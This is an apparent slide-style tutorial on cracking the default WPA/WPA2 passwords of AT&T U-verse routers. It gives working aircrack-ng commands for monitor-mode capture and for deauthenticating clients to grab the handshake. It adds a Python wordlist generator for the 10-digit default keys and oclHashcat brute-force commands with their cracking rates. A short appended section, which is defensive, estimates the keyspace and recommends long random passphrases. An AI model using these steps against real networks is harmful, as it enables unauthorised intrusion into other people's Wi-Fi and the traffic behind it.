Cracking AT&T U-verse Default WPA1/2 Passwords
by Jason Wheeler
Awesome blog: http://blog.init6.me
Getting the Handshake
Aircrack's site has a pretty good tutorial.
Boot from Back Track 5 R3
First, see which Wi-Fi networks are in range. Start your wireless interface in monitor mode.
#airmon-zc start wlan0
#airodump-ng --encrypt wpa mon0
#airmon-zc stop mon0
Start airmon-zc on the channel of the target.
#airmon-zc start wlan0 <Channel Number>
Then start airodump on the same channel along with some other options.
#airodump-ng mon0 --encrypt wpa --write <FILENAME> --output-format pcap -a --channel <Channel number>
Deauthenticate a client
#aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0
Where:
• -0 means deauthentication
• 5 is the number of deauths to send
• -a 00:14:6C:7E:40:80 is the MAC address of the access point
• -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
• mon0 is the interface name
WPA Handshake
Verify 4-way Handshake
PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)
The PTK is a keyed-HMAC function using the PMK on the two MAC addresses and the two nonces from the first two packets of the 4-Way Handshake.
Verify 4-way Handshake
The easy way......
#pyrit -r <FILENAME>.pcap analyze
Strip out the junk.
#pyrit -r <FILENAME>.pcap -o OUTPUT.pcap strip
CAP-2-HCCAP
To turn your pcap file into a hashcat-plus friendly file you can upload it to https://hashcat.net/cap2hccap/
CRACK!!
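Python Script
# 2wire.py: print every 10-digit string that has no digit three times in a row.
# Written for Python 2 (xrange); on Python 3 use range instead.
MAX_INT = 9999999999
BAD_PATTERNS = {x * 3 for x in '0123456789'}  # '000', '111', ... '999'

for number in xrange(MAX_INT):
    int_string = str(number).rjust(10, '0')  # zero-pad to 10 digits
    if any(pattern in int_string for pattern in BAD_PATTERNS):
        continue
    print(int_string)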
Hashcat-plus
$python 2wire.py | ./oclhashcat-plus64.bin -m 2500 -a 0 <filename>.hccap --gpu-accel=160 --gpu-loops=1024
88,770 c/s real
or
$./oclhashcat-plus64.bin -m 2500 -a 3 <filename>.hccap --gpu-accel=160 --gpu-loops=1024 -1?d ?1?1?1?1?1?1?1?1?1?1
114K c/s real
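What the two quoted rates mean for the strength of a 10-digit default passphrase, as an added example (not part of the original slides). It counts the candidates left after the script's triple-digit filter and converts both keyspaces to wall-clock time; the 16-character random alphanumeric replacement is an assumption chosen for comparison.

```python
def count_no_triple(length: int, alphabet: int = 10) -> int:
    """Count strings of `length` symbols in which no symbol occurs 3 times in a row."""
    # run1 / run2: strings whose final run of identical symbols has length 1 / 2.
    run1, run2 = alphabet, 0
    for _ in range(length - 1):
        run1, run2 = (alphabet - 1) * (run1 + run2), run1
    return run1 + run2


def hours_to_exhaust(keyspace: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a constant rate."""
    return keyspace / guesses_per_second / 3600


FULL_KEYSPACE = 10 ** 10                  # every 10-digit string (mask run)
FILTERED_KEYSPACE = count_no_triple(10)   # candidates the Python script emits
PIPE_RATE = 88_770                        # c/s quoted for the piped run
MASK_RATE = 114_000                       # c/s quoted for the mask run
RANDOM_16_ALNUM = 62 ** 16                # assumed replacement: 16 random [A-Za-z0-9]


def summary() -> dict:
    return {
        "filtered_candidates": FILTERED_KEYSPACE,
        "filtered_fraction": FILTERED_KEYSPACE / FULL_KEYSPACE,
        "pipe_hours": hours_to_exhaust(FILTERED_KEYSPACE, PIPE_RATE),
        "mask_hours": hours_to_exhaust(FULL_KEYSPACE, MASK_RATE),
        "random16_years": hours_to_exhaust(RANDOM_16_ALNUM, MASK_RATE) / (24 * 365),
    }


if __name__ == "__main__":
    for key, value in summary().items():
        print(f"{key}: {value:,.3f}")
```

At the rates on the slide, the whole default keyspace falls in roughly a day either way, which is why a factory 10-digit key should be replaced with a long random passphrase.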
sources
http://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/Part+II+The+Design+of+Wi-Fi+Security/Chapter+10.+WPA+and+RSN+Key+Hierarchy/